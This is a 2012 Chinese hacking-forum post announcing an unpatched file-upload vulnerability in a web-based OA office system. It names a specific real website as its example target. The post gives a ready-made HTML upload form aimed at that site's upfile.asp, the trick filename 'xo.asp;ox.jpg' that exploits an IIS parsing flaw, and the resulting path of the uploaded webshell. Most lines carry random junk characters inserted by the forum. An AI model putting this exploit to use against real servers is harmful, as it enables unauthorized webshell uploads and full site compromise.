找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2219|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞5 J6 e% G+ ^+ G/ }
6 d7 k0 V7 A6 U% N5 T! @& M2 m. m
系统介绍:
) m( g. p9 q( w' I: b) [
$ |3 W3 T# V( E* |" c) X全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
) K' J, ?; L: O% B7 E6 Z, r" H0 N- Q
主要功能:
0 s, `: _: ]% f# ]; b1 t公司通告
. e# y# J5 F$ d; [% A4 K' `+ h( [工作计划
" H' _. v4 t* f0 K* ~6 j5 S) |通讯助理 7 Q) m/ S. _0 {/ D/ S7 Z7 @
客户资源
5 f, r; n7 s0 e. t% N0 R' s我的公文 ) q% ^4 Q2 s+ ]4 C% ^$ G
公文传阅
3 P( L" t: I+ p) f+ I公共资源
8 i5 A' @0 i  d资源预约
0 t" P5 V: E: D  h% v3 ?7 g2 z5 M5 M今日考勤 ' D3 t# b4 i$ R5 N) S
个人计划 ; j5 W3 q3 B. I$ Y- ^8 a# P& k
个人通讯录 % ?1 d3 x8 @" R. f4 p- ]
个人基本档案 , b- B/ u5 o( c  }. o& S8 P1 r8 b. l6 J
未读邮件
/ i# y) K/ U5 i7 n, [发邮件 3 U! x& o9 W% z7 s  s, |- R# l0 f
收件夹 1 ]2 `7 H- n- M9 D3 s
寄件夹
0 O: a% u, K* Q网络硬盘 7 o0 M* h, z& J1 ?4 r: }7 M2 O
网络会议 ( t# x! y' y; M1 s% L% q
网络调查 4 i) o, S; W9 F, @. N4 \. K
交流论坛* y+ g9 N5 H& ?  g
/ ~- t# ^9 z, c; w1 ~, y( i8 {( K
有兴趣测试的朋友可以下源码看看8 `* _( O7 H# B& Q" \
: U3 \0 o4 z" s6 T
源码下载:
% ^4 r% j. E  y+ r- D6 G, U0 ?6 S% J/ P' [2 R4 w' b. t
http://www.mycodes.net/30/4750.htm
- ^- r7 w6 H$ g4 u
1 E3 v& o# b* F4 ]- X+ B. {漏洞介绍:+ T( b0 H4 h% i

: g4 a& r7 C9 b; K5 r" \2 P1 Y. w由upfile.asp上传文件漏洞引起' U; a  J9 V3 d! L- D% [
+ S2 @+ Y% l+ I& L/ `
测试方法:; k5 T7 G* A+ F  B6 u  i( x. M+ p
4 @" ]) s& W% I" _: s
使用名小子上传http://www.itlynn.com/upfile.asp即可
  [" T2 o. F4 [5 ~% _
# }: k, Y% Y. o" U5 k如果upfile.asp文件被删除不存在。
$ ~0 K4 F5 ?$ z2 z' l
7 C- }+ E" Z1 o  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
) u, D* A" ^1 I) [5 A1 U% x" @& E6 e4 R7 v* r3 |+ I3 n) Q
如果存在那么将如下代码保存为upfile.html。% U1 B/ e6 Y) |2 F& J  }+ H5 B# r

8 D: n6 o  y4 d3 m+ C$ S然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp$ |" W1 l" N- D5 D# q/ f, @- u9 P) w
6 |$ D; C! i+ J1 c

7 K' ~0 c" i. H! K" F  r, O
- s$ u/ f1 Y% X, ?# _$ f01 <table border='0' align="center" cellpadding="5"> # S, ~0 P# V' E
' |$ }- r. S6 L9 f" C9 C( z
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">   Q4 ]. L0 z# v, {- t0 W- m

6 I- I+ V% g' ^03 <tr>
5 J2 {& H5 _% N1 `$ r8 Z( R. i' F
* }# i! c0 F# H04             <td>报错:</td> 4 D) t2 p7 J% I$ X0 H' M9 O  Y+ C
8 w6 v* }4 ~% ]( N4 w. w* d% k
05             <td><input type='radio' name='errnumber' value='0'>
6 F& c, [& ]$ [9 Q% F' r
" Y; a1 C. A1 [# c8 n06               自动更名 8 F" N3 s, u, v/ q2 w4 O: c
- H& V! b5 L, }* |1 j* |
07               <input type='radio' name='errnumber' value='1' checked>
- u+ w( L0 M3 i. i' K6 Q8 A. P  y1 u/ A# |% e8 I3 g
08               报错方式
' P. F% @/ d. y* ?/ V; |/ b9 a: _% B0 b* y  J, T3 h
09               <input type='radio' name='errnumber' value='2'> 2 m1 v# ^+ Z' ~6 {1 W( c. g2 O& Q( B

" n8 ]1 j# C, }" p; `8 Y10               直接覆盖</td>
7 ~- k* f! z( P6 W: s% `; b
" Q9 i+ S* U% \* l4 w11           </tr> . h: ^, d8 d1 O2 v4 a

, s7 `2 e8 @* w7 y  M  j12           <tr> 4 F. Z0 S1 Y8 ]) ?$ g

; n5 @* d; f$ e/ |, O# B8 E13             <td>主题:</td>
5 J; m' U) i( t0 ~+ [2 ]" g% g! C8 h- Q
14             <td><input type='text' name='filename' size='30'></td> ! M, T" u4 B9 e: N7 p# |
' [; S& G9 h; I( k! z  @" y
15           </tr> . i" J; a( h5 J7 H! x
9 B* P: i; |: S0 c$ i, X
16           <tr> , x, a! i# M& L8 B) n8 C

# g  A1 D6 h: B9 P( [( t! [. h+ U  s17             <td>文件:</td>
7 L: \4 w8 v+ M8 K( O
6 }+ H- ?, b9 t3 B) X7 L6 O4 q+ O18             <td><input type="file"name="fruit"size="30"></td> ! `$ q0 q" N/ [" S5 r8 f; c

3 Q5 z, ]$ C3 k4 R, p* o8 I19           </tr>
, B* z; H% A7 c. w8 q; {1 M8 T
2 G* g/ N4 q+ S2 c% v20           <tr> 2 f- W: `! g! A" e4 I
4 E# T5 a5 l0 z! ~2 E: V
21             <td valign='top'>简介:</td>
; A: I) K) U8 y8 }% \" I3 ?6 V! Q4 k0 [/ ^9 I3 |
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 0 Z  K- B! ~7 o6 e0 |

! R# ]* f" z9 d1 m( [23           </tr> 4 [" c5 l% G+ F4 P8 j7 @

/ q% @% c% E7 j3 O$ r3 P7 k24   / A  f5 |8 e9 r; U

( ]8 t- f: y8 E' c25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> : L/ u. G9 I3 z; n, f, f

* F1 M7 @8 D+ y2 L3 ~26           </tr>
5 h0 U$ Y0 t$ f: {
% G& t# o: p' t! p7 V: I1 U27         </form>
( T$ y: d) b& h3 l' g4 n5 p( R7 t9 p/ J
然后打开上传一个文件名为xo.asp;ox.jpg的文件。( {2 O8 q# Y3 o7 g

7 G! H3 m- V6 i+ M; m3 G& [) N
0 l5 \) `) _! ^+ |! k) T( ]/ m# s& k. v1 y. M' k
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg/ Z( N; @  j+ @+ L1 R1 \4 j
$ R# _# P9 t. o! [
此漏洞需要配合解析漏洞利用。
5 d' C; U, @) f$ D9 D6 b
, E6 V5 u/ P# K9 U: e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表